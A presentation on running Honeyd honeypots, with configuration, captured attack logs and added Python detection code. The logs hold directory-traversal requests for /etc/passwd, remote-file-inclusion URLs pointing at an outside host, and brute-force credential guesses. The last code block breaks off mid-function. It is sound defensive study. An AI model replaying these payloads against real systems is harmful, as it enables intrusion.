Using Honeypots with Honeyd (Uso de Honeypots com Honeyd)

Category: Technology

Published on January 15, 2009

Author: UlissesCosta

Source: slideshare.net

Description

A paper on implementing honeypots using Honeyd.

Using HoneyPots with Honeyd
Pedro Pereira, Ulisses Costa
Cryptography and Information Systems Security
18 December 2008

Outline

1 Introduction: HoneyPots; Honeyd
2 Log: Honeyd's main log
3 SMTP: open mail relay
4 HTTP: webcollage/1.135a; directory traversal; Morfeus Scanner (WebCalendar, Mambo/Joomla, preventing Morfeus Scanner attacks); attack on POP3; SSH
5 The threat


What are HoneyPots?

- Programs that emulate known vulnerabilities
- Traps to detect or deter attacks

Types of HoneyPots

Personality:
- High-interaction
- Low-interaction

Modus operandi:
- Server
- Client


Honeyd

- Creation of virtual hosts
- Configuration of the hosts
- Support for more than 1000 personalities
- Many dozens of scripts for service emulation

Honeyd configuration

    bash> farpd 192.168.1.50 -i eth0

    # File: /etc/defaults/honeyd
    # Defaults for honeyd initscript
    # Run as a daemon
    RUN="yes"
    # Network interface on which honeyd listens for requests
    INTERFACE="eth0"
    # Network that honeyd simulates
    NETWORK=192.168.1.50
    # Set of options
    # -c hostname:port:username:password
    OPTIONS="-c localhost:12345:username:password"

The -c hostname:port:username:password option

Generation of partial Honeyd statistics:

    bash> honeydstats --os_report /etc/honeypot/os --port_report /etc/honeypot/port --spammer_report /etc/honeypot/spam --country_report /etc/honeypot/country -f /etc/honeypot/honeydstats.conf -l localhost -p 12345

    # File: /etc/honeypot/honeydstats.conf
    # honeydstats configuration file
    username:password

HoneyPot configuration (1/2)

    # File: /etc/honeypot/honeyd.conf
    # Honeypot configuration
    create win2k
    set win2k personality "Microsoft Windows 2000 SP2"
    set win2k default tcp action reset
    set win2k default udp action reset
    set win2k default icmp action block
    set win2k uptime 3567
    add win2k tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 23 "perl /usr/share/honeyd/scripts/unix/linux/suse7.0/telnetd.sh"
    add win2k tcp port 25 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 110 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-pop3.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 143 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 389 "sh /usr/share/honeyd/scripts/win32/win2k/ldap.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 5901 "sh /usr/share/honeyd/scripts/win32/win2k/vnc.sh $ipsrc $sport $ipdst $dport"
    add win2k udp port 161 "perl /usr/share/honeyd/scripts/unix/general/snmp/fake-snmp.pl public private --config=scripts/unix/general"

HoneyPot configuration (2/2)

    add win2k udp port 137 proxy $ipsrc:137
    add win2k udp port 138 proxy $ipsrc:138
    add win2k udp port 445 proxy $ipsrc:445
    add win2k tcp port 137 proxy $ipsrc:137
    add win2k tcp port 138 proxy $ipsrc:138
    add win2k tcp port 139 proxy $ipsrc:139
    add win2k tcp port 445 proxy $ipsrc:445
    bind 192.168.1.50 win2k

- Monitoring the NETBIOS ports was not feasible: too much complexity
- Decision: forward them back to the source

Start our HoneyPot:

    bash> /etc/init.d/honeyd start


Files

- /var/log/honeyd.txt: SMTP, Telnet, IMAP, POP3
- /var/log/honeypot/web.log: HTTP
- /var/log/honeypot/honeyd.log: Honeyd's main log


Format of the /var/log/honeypot/honeyd.log file

Columns: Date, Protocol, T, SrcIP, SrcPort, DstIP, DstPort, Info, Comment

    Date  Protocol  T  SrcIP            SrcPort  DstIP  DstPort: Info  Comment
    ...   tcp(6)    S  88.44.123.210    3637     ...    139            [Windows XP SP1]
    ...   tcp(6)    S  82.155.0.49      22617    ...    139
    ...   tcp(6)    E  82.155.1.160     4399     ...    445: 00
    ...   tcp(6)    -  82.155.122.18    61582    ...    139: 40 R
    ...   icmp(1)   -  80.236.5.27               ...: 3(13): 56
    ...   tcp(6)    -  82.154.64.174    34507    ...    445: 40 RA
    ...   tcp(6)    -  124.8.74.33      1806     ...    25: 70 FPA     [Windows XP SP1]
    ...   tcp(6)    -  168.167.152.228  58274    ...    445: 52 FA     [Windows XP SP1]
    ...   tcp(6)    -  168.167.152.228  58274    ...    445: 52 FA
    ...   tcp(6)    -  82.155.57.245    58274    ...    445: 52 PA     [Windows XP SP1]
    ...   tcp(6)    -  193.136.19.149   58274    ...    445: 52 PA
    ...   tcp(6)    -  88.175.73.149    4332     ...    139: 40 R      [Windows XP SP1]
    ...   tcp(6)    -  82.155.137.139   1230     ...    445: 40 A      [Windows XP SP1]
    ...   tcp(6)    -  82.155.7.176     2794     ...    445: 40 A
    ...   tcp(6)    -  82.155.116.238   3578     ...    23: 60 S       [Linux 2.6.1-7]
    ...   tcp(6)    -  124.207.41.198   48804    ...    23: 40 S
    ...   udp(17)   -  192.168.1.254    67       ...    68: 298

- Date in the format: 2008-12-15-22:59:03.4039
- DstIP is always the same (in this case): 192.168.1.50

Format of the /var/log/honeypot/honeyd.log file

    2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
    2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008

- For TCP and UDP not every packet transmission is recorded; that would be too verbose
- Only the amount transmitted is logged
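The record layout above, turned into a small parser and a per-source summary so the main log can be triaged without reading it by hand. This is an added example written for this page, not code from the presentation or from Honeyd: the field regex is reconstructed from the slide's excerpts (S and E are the start and end records of one connection, as the two lines above show), the reading of the two counters on an E record as bytes received and bytes sent is an assumption, and the sample lines are constructed in the slide's layout (values from the slides plus a TEST-NET sweeper).

```python
import re
from collections import defaultdict

# Layout reconstructed from the slide:
#   <date> <proto>(<num>) <S|E|-> <src> <sport> <dst> <dport>[: <info>] [<OS fingerprint>]
# Only tcp/udp records carry ports; other layouts (icmp) are reported as unparsed.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}-\d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?P<proto>tcp|udp)\((?P<pnum>\d+)\)\s+"
    r"(?P<kind>[SE-])\s+"
    r"(?P<src>\d+(?:\.\d+){3})\s+(?P<sport>\d+)\s+"
    r"(?P<dst>\d+(?:\.\d+){3})\s+(?P<dport>\d+)"
    r"(?P<rest>.*)$"
)
END_RE = re.compile(r"^:\s*(?P<first>\d+)\s+(?P<second>\d+)")
OS_RE = re.compile(r"\[(?P<os>[^\]]+)\]")

def parse_line(line):
    """Parse one honeyd.log line into a dict; None for lines in another layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = {k: m.group(k) for k in ("ts", "proto", "kind", "src", "dst")}
    rec["sport"], rec["dport"] = int(m.group("sport")), int(m.group("dport"))
    rest = m.group("rest")
    # Assumption: on an 'E' (end) record the two counters are bytes received and bytes sent.
    end = END_RE.match(rest.strip()) if rec["kind"] == "E" else None
    rec["bytes_in"] = int(end.group("first")) if end else None
    rec["bytes_out"] = int(end.group("second")) if end else None
    os_match = OS_RE.search(rest)
    rec["os"] = os_match.group("os") if os_match else None
    return rec

def summarize(lines):
    """Per source: new connections (S records), bytes from E records, destination ports touched."""
    stats = defaultdict(lambda: {"connections": 0, "bytes_in": 0, "bytes_out": 0, "ports": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = stats[rec["src"]]
        entry["ports"].add(rec["dport"])
        if rec["kind"] == "S":
            entry["connections"] += 1
        elif rec["kind"] == "E":
            entry["bytes_in"] += rec["bytes_in"] or 0
            entry["bytes_out"] += rec["bytes_out"] or 0
    return dict(stats)

def port_sweepers(lines, min_ports=3):
    """Sources that touched at least `min_ports` distinct destination ports."""
    return sorted(src for src, e in summarize(lines).items() if len(e["ports"]) >= min_ports)

# Constructed sample in the slide's layout: values from the slides, plus a TEST-NET
# address (198.51.100.23) that walks several ports and an icmp line the parser skips.
SAMPLE = """\
2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008
2008-12-11-09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows XP SP1]
2008-12-11-09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920
2008-12-15-22:59:03.4039 tcp(6) - 88.175.73.149 4332 192.168.1.50 139: 40 R [Windows XP SP1]
2008-12-15-22:59:04.0010 tcp(6) S 198.51.100.23 40001 192.168.1.50 21
2008-12-15-22:59:04.0020 tcp(6) S 198.51.100.23 40002 192.168.1.50 23
2008-12-15-22:59:04.0030 tcp(6) S 198.51.100.23 40003 192.168.1.50 25
2008-12-15-22:59:05.1100 icmp(1) - 80.236.5.27 192.168.1.50: 3(13): 56
""".splitlines()

if __name__ == "__main__":
    for src, entry in summarize(SAMPLE).items():
        print(src, entry)
    print("port sweepers:", port_sweepers(SAMPLE))
```

Run against the real file with `summarize(open("/var/log/honeypot/honeyd.log"))`; the `ports` set per source is what separates a single probe from a sweep, and the byte counters on E records show which sessions actually exchanged data.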


SMTP

- Used on the server side to send messages
- To receive, POP3 or IMAP is used

SMTP - HoneyPot

The EHLO command in SMTP

- Command used to identify clients

The EHLO command in SMTP

    S: 220 bps-pc9.local.mynet Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sex Jan 9 22:10:11 WET 2009
    C: EHLO windows
    S: 250-bps-pc9.local.mynet Hello [12]
    S: 250-TURN
    S: 250-ATRN
    S: 250-SIZE
    S: 250-ETRN
    S: 250-PIPELINING
    S: 250-DSN
    S: 250-ENHANCEDSTATUSCODES
    S: 250-8bitmime
    S: 250-BINARYMIME
    S: 250-CHUNKING
    S: 250-VRFY
    S: 250-X-EXPS GSSAPI NTLM LOGIN
    S: 250-X-EXPS=LOGIN
    S: 250-AUTH GSSAPI NTLM LOGIN
    S: 250-AUTH=LOGIN
    S: 250-X-LINK2STATE
    S: 250-XEXCH50
    S: 250 OK

- Clients identify themselves with domain names that are not real

Spam on SMTP servers

Solutions

- EHLO [host]: check whether the hostnames resolve


Attacks

    HELO 82.155.248.223
    MAIL FROM: <jk9l3g4jle@yahoo.com>
    RCPT TO: <sseenndd1201@yahoo.com.hk>
    DATA
    Subject: Super webscan open relay check succeded, hostname = 82.155.248.223

    2008-12-11-09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows XP SP1]
    2008-12-11-09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920

Attacks

    HELO 82.155.251.32
    MAIL FROM: <gt48m7g3k6f@yahoo.com>
    RCPT TO: <sseenndd1201@yahoo.com.hk>
    DATA
    Subject: Super webscan open relay check succeded, hostname = 82.155.251.32

    2008-12-23-12:18:11.3939 tcp(6) S 114.44.42.34 2748 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:18:11.3953 tcp(6) S 114.44.42.34 2750 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:18:12.1966 tcp(6) E 114.44.42.34 2750 192.168.1.50 25: 0 116
    2008-12-23-12:18:13.1996 tcp(6) E 114.44.42.34 2748 192.168.1.50 25: 0 232
    2008-12-23-12:21:55.1773 tcp(6) S 114.44.42.34 3347 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:21:57.1324 tcp(6) E 114.44.42.34 3347 192.168.1.50 25: 0 232
    2008-12-23-14:06:30.5003 tcp(6) S 114.44.42.34 1634 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-14:06:30.5023 tcp(6) S 114.44.42.34 1635 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-14:06:43.0390 tcp(6) E 114.44.42.34 1635 192.168.1.50 25: 177 335
    2008-12-23-14:06:51.4612 tcp(6) E 114.44.42.34 1634 192.168.1.50 25: 177 418

Attacks

    HELO 82.155.103.147
    MAIL FROM: <ttc585ttc585@yahoo.com.tw>
    RCPT TO: <vjd39hww@yahoo.com.tw>
    DATA
    Received: from ([145.200.201.114]) by 82.155.103.147 id <9624303-98482>; Tue, 06 Jan 2009 21:16:04 -0100
    Message-ID: <w58$6a4j1fqc6q@ocjc8ujvz>
    From: "" <ttc585ttc585@yahoo.com.tw>
    To: <vjd39hww@yahoo.com.tw>
    Subject: BC_82.155.103.147
    Date: Tue, 06 Jan 09 21:16:04 GMT
    MIME-Version: 1.0
    Content-Type: multipart/alternative; boundary="----=_NextPart_000_000D_01C2CC60.49F4EC70"
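The two checks the SMTP sections call for, put into code: the "Solutions" slide (validate the EHLO/HELO argument and check that it resolves) and the open-relay probes just shown (a bare IP in HELO and a recipient at a domain the server does not serve). This is an added example written for this page, not code from the presentation or from the Honeyd SMTP script. RFC 5321 requires the HELO/EHLO argument to be either a fully qualified domain name or an address literal in brackets, which is the rule applied here; the DNS lookup is replaced by a constructed table (`FAKE_DNS`, `stub_resolve`) so the example runs offline, and `local.mynet` is taken from the banner on the EHLO slide.

```python
import ipaddress
import re

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens, plus a TLD.
FQDN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z][a-z0-9-]{0,61}[a-z0-9]$",
    re.IGNORECASE,
)

# Constructed lookup table standing in for DNS so the example runs offline.
FAKE_DNS = {"mail.example.com": "192.0.2.10"}

def stub_resolve(name):
    """Return the address a name resolves to, or None (swap in a real resolver in use)."""
    return FAKE_DNS.get(name.lower())

def check_ehlo_argument(arg, resolve=stub_resolve):
    """Classify an EHLO/HELO argument as (accepted, reason).
    Accepted forms: a bracketed address literal or a resolvable fully qualified name."""
    arg = arg.strip()
    if not arg:
        return False, "empty argument"
    if arg.startswith("[") and arg.endswith("]"):
        try:
            ipaddress.ip_address(arg[1:-1])
        except ValueError:
            return False, "malformed address literal"
        return True, "address literal"
    try:
        ipaddress.ip_address(arg)
    except ValueError:
        pass
    else:
        return False, "bare IP address (RFC 5321 wants an address literal in brackets)"
    if not FQDN_RE.match(arg):
        return False, "not a fully qualified domain name"
    if resolve(arg) is None:
        return False, "domain does not resolve"
    return True, "resolvable FQDN"

def relay_decision(rcpt_to, local_domains, authenticated=False):
    """Accept RCPT TO only for domains we serve, unless the client authenticated.
    An open relay is a server that skips this rule."""
    domain = rcpt_to.strip().strip("<>").rpartition("@")[2].lower()
    if authenticated or domain in {d.lower() for d in local_domains}:
        return "accept"
    return "reject: relaying denied"

def screen_session(helo, rcpts, local_domains, resolve=stub_resolve):
    """Verdicts for one session: the HELO/EHLO check and one relay decision per recipient."""
    return {
        "helo": check_ehlo_argument(helo, resolve),
        "rcpt": [(r, relay_decision(r, local_domains)) for r in rcpts],
    }

if __name__ == "__main__":
    # The open-relay probe seen on the slides: bare-IP HELO and a foreign recipient.
    print(screen_session("82.155.248.223", ["<sseenndd1201@yahoo.com.hk>"], {"local.mynet"}))
```

On a honeypot the point is to log these verdicts rather than enforce them; on a production MTA the relay rule is the one that matters most, because the "open relay check succeded" probes above are exactly what a spammer sends to find servers that lack it.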


HTTP hits


User agent: webcollage/1.135a

    --MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
    User-Agent: webcollage/1.135a
    Referer: http://random.yahoo.com/fast/ryl
    Host: www.morgangirl.com
    ",--ENDMARK--

- An attempt to fetch an image through the HoneyPot
- The HoneyPot may have been "seen" by a proxy scanner
- The HoneyPot taken for an open proxy


Directory traversal

- Also known as the dot dot slash attack (../)
- Exploits insufficient validation of requests
- Targets system files

    GET ../../../../../../../../../../etc/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,"GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--

Directory traversal

    GET .../../../../../../../../../../etc/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:20:58 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59711,80,"GET %2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--

Directory traversal

    GET ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:21:02 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59727,80,"GET %2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--

Directory traversal

    GET ..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:21:04 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59740,80,"GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--

Directory traversal

    GET //etc/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:20:59 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59700,80,"GET %2F%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--

Conclusion

- On the HoneyPot the attack did not succeed: it is a low-interaction system
- On our HoneyPot the answer was error 302 Object moved
- The attacker used the Nmap scripting engine


Morfeus Scanner

- Searches for PHP vulnerabilities
- Known vulnerabilities

Morfeus Scanner - WebCalendar

- Creation of online calendars
- Vulnerability in the file send_reminders.php

    --MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Morfeus Scanner
    Host: 82.155.248.190
    Connection: Close
    ",--ENDMARK--

Morfeus Scanner - Mambo/Joomla

- A very well-known CMS
- The attacker tries to set the mosConfig_absolute_path variable of the index.php file

    --MARK--,"Wed Dec 24 16:07:34 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55438,80,"GET /shop/index.php?option=com_registration&task=register//boutique/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Morfeus Scanner
    Host: 82.155.248.190
    Connection: Close
    ",--ENDMARK--

Preventing Morfeus Scanner attacks

One way to block this kind of attack coming from MFS is to add the following lines to the ".htaccess" file in the website's folder.

    # Start of .htaccess change.
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} ^Morfeus
    RewriteRule ^.*$ - [F]
    # End of .htaccess change.


Brute-force attempt on the POP3 server

Brute-force attempt on the POP3 server

    ...
    --MARK--,"Mon Dec 22 11:34:48 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54678,110,"USER root
    PASS root
    ",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:49 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54729,110,"USER root
    PASS root1
    ",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:50 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54731,110,"USER staff
    PASS staff
    ",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:52 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,"USER root
    PASS 12345
    ",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:53 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,"USER www
    PASS www
    ",--ENDMARK--
    ...
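The HTTP and POP3 records on the preceding slides all share the `--MARK-- ... --ENDMARK--` layout written by the Honeyd service scripts, so one parser serves the webcollage proxy probe, the directory-traversal requests, the Morfeus remote-include requests and the POP3 brute-force attempts. Below is an added example written for this page, not code from the presentation or from Honeyd: the record regex is reconstructed from the slide excerpts (one block per connection, payload quoted, which is an assumption), the classifier decodes percent-encoding a bounded number of times and treats `%5C` (backslash) as a separator so the four Nmap NSE variants collapse to the same `../../etc/passwd`, and the sample capture is constructed from the slides' requests (the remote-include host replaced by a TEST-NET address).

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Record layout reconstructed from the slide excerpts. Assumption: every Honeyd service
# script writes one --MARK-- ... --ENDMARK-- block per connection, with the payload quoted.
MARK_RE = re.compile(
    r'--MARK--,"(?P<ts>[^"]*)","(?P<service>[^"]*)","(?P<src>[^"]*)","(?P<dst>[^"]*)",'
    r'(?P<sport>\d+),(?P<dport>\d+),"(?P<payload>.*?)",--ENDMARK--',
    re.DOTALL,
)

def parse_marks(text):
    """Return one dict per --MARK-- record found in the capture."""
    records = []
    for m in MARK_RE.finditer(text):
        rec = m.groupdict()
        rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
        records.append(rec)
    return records

def normalize_target(raw, rounds=3):
    """Percent-decode a bounded number of times (scanners double-encode) and treat
    backslash as a path separator, so '%2E%2E%5C%2F' becomes '../'."""
    target = raw
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target.replace("\\", "/")

def classify_http(payload):
    """Labels for the request line of an HTTP payload; empty list when nothing stands out."""
    lines = payload.strip().splitlines()
    parts = lines[0].split() if lines else []
    if len(parts) < 2:
        return ["malformed-request-line"]
    raw = parts[1]
    labels = []
    if raw.lower().startswith(("http://", "https://")):
        labels.append("proxy-probe")  # absolute URI: the client treats us as an open proxy
    target = normalize_target(raw)
    path = re.sub(r"/+", "/", target.split("?", 1)[0])
    if any(len(seg) >= 2 and set(seg) == {"."} for seg in path.split("/")):
        labels.append("traversal")  # '..' or '...' segments survive decoding
    if path.endswith("/etc/passwd"):
        labels.append("sensitive-path")
    if re.search(r"=https?://", target, re.IGNORECASE):
        labels.append("remote-include")  # a parameter pointing at a remote file (Morfeus style)
    return labels

def pop3_attempts(records):
    """{source: [(user, password), ...]} gathered from POP3 USER/PASS command pairs."""
    attempts = defaultdict(list)
    for rec in records:
        if "POP3" not in rec["service"].upper():
            continue
        user = password = None
        for line in rec["payload"].splitlines():
            cmd, _, arg = line.strip().partition(" ")
            if cmd.upper() == "USER":
                user = arg.strip()
            elif cmd.upper() == "PASS":
                password = arg.strip()
        if user is not None:
            attempts[rec["src"]].append((user, password))
    return dict(attempts)

def brute_force_sources(records, threshold=5):
    """Sources with at least `threshold` POP3 login attempts in the capture."""
    return sorted(src for src, tries in pop3_attempts(records).items() if len(tries) >= threshold)

# Constructed sample in the slides' layout (scanner addresses taken from the slides,
# the remote-include host replaced by the TEST-NET address 203.0.113.9).
SAMPLE_LOG = '''\
--MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
User-Agent: webcollage/1.135a
",--ENDMARK--
--MARK--,"Sun Jan 4 05:21:02 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59727,80,"GET %2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
",--ENDMARK--
--MARK--,"Sun Jan 4 05:20:59 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59700,80,"GET %2F%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
",--ENDMARK--
--MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://203.0.113.9/a.gif?/ HTTP/1.1
User-Agent: Morfeus Scanner
",--ENDMARK--
'''
POP3_PAIRS = [("root", "root"), ("root", "root1"), ("staff", "staff"), ("root", "12345"), ("www", "www")]
POP3_LOG = "".join(
    f'--MARK--,"Mon Dec 22 11:34:{48 + i} WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",'
    f'{54678 + i},110,"USER {u}\nPASS {p}\n",--ENDMARK--\n'
    for i, (u, p) in enumerate(POP3_PAIRS)
)

if __name__ == "__main__":
    recs = parse_marks(SAMPLE_LOG + POP3_LOG)
    for r in recs:
        if "HTTP" in r["service"]:
            print(r["src"], classify_http(r["payload"]))
    print("brute force:", brute_force_sources(recs))
```

Feed it the real files with `parse_marks(open("/var/log/honeypot/web.log").read())`; the decoding step is the part worth keeping even outside a honeypot, since a filter that looks for a literal `../` misses three of the four Nmap variants on the slides.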


SSH

Here is a chart showing the usernames that were tried: (chart not reproduced)

SSH

And the following chart shows the passwords that were tried: (chart not reproduced)


The threat

Port scanning

- Discover machines and their ports
- Crafting of custom packets
- Hard to master
- Nmap - insecure.org

Port scanning

- Open or Accepted: the machine sent a reply indicating that a service is listening on that port;
- Closed, Denied or Not Listening: the machine sent a reply indicating that any connection to the port will be refused;
- Filtered, Dropped or Blocked: there was no reply from the machine.

Port scanning

Types of technique:
- TCP/SYN
- TCP Connect
- UDP

TCP Connect

Port scanning: optimisation

    golden@golden-laptop:~$ sudo nmap -sS -sV 192.168.100.0/24
    ...
    Nmap finished: 256 IP addresses (29 hosts up) scanned in 2033.375 seconds
    golden@golden-laptop:~$ sudo nmap -sS -sV -P0 192.168.100.0/24
    ...
    Nmap finished: 256 IP addresses (32 hosts up) scanned in 2038.191 seconds

Attack

- Brute force / dictionaries
- Exploitation of vulnerabilities

SSH

- Port 22
- Attacked by brute force / dictionaries

    cat /var/log/auth.log

SSH - log

    Dec 24 01:24:46 golden-laptop sshd[23906]: Invalid user oracle from 89.235.152.18
    Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): check pass; user unknown
    Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
    Dec 24 01:24:48 golden-laptop sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
    Dec 24 01:24:49 golden-laptop sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
    Dec 24 01:26:01 golden-laptop sshd[23963]: Invalid user test from 89.235.152.18
    Dec 24 01:26:01 golden-laptop sshd[23963]: pam_unix(ssh:auth): check pass; user unknown
    Dec 24 01:26:01 golden-laptop sshd[23963]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
    Dec 24 01:26:04 golden-laptop sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
    Dec 24 01:26:05 golden-laptop sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
    Dec 24 01:26:21 golden-laptop sshd[23975]: Invalid user cvsuser from 89.235.152.18
    Dec 24 01:26:21 golden-laptop sshd[23975]: pam_unix(ssh:auth): check pass; user unknown
    Dec 24 01:26:21 golden-laptop sshd[23975]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
    Dec 24 01:26:22 golden-laptop sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
    Dec 24 01:26:24 golden-laptop sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
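The auth.log excerpt above is what a dictionary attack looks like on the server side: repeated "Failed password" lines from one address, each for a different guessed username. The detection below is an added example written for this page, not code from the presentation: it parses those lines, flags any source with a burst of failures inside a time window, and tabulates the usernames tried (the distribution the SSH charts on the earlier slides show). The "reverse mapping ... POSSIBLE BREAK-IN ATTEMPT!" lines are deliberately not counted, since that message only reports a forward/reverse DNS mismatch. The sample is constructed from the slide's lines for 89.235.152.18 plus one benign failure from a TEST-NET address; syslog timestamps carry no year, so the year is passed in.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Syslog-style sshd lines as on the slide. "reverse mapping ... POSSIBLE BREAK-IN ATTEMPT!"
# only reports a forward/reverse DNS mismatch, so it is not counted as a failure here.
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d+(?:\.\d+){3}) port \d+"
)

def parse_ts(text, year):
    """Syslog timestamps carry no year; the caller supplies it."""
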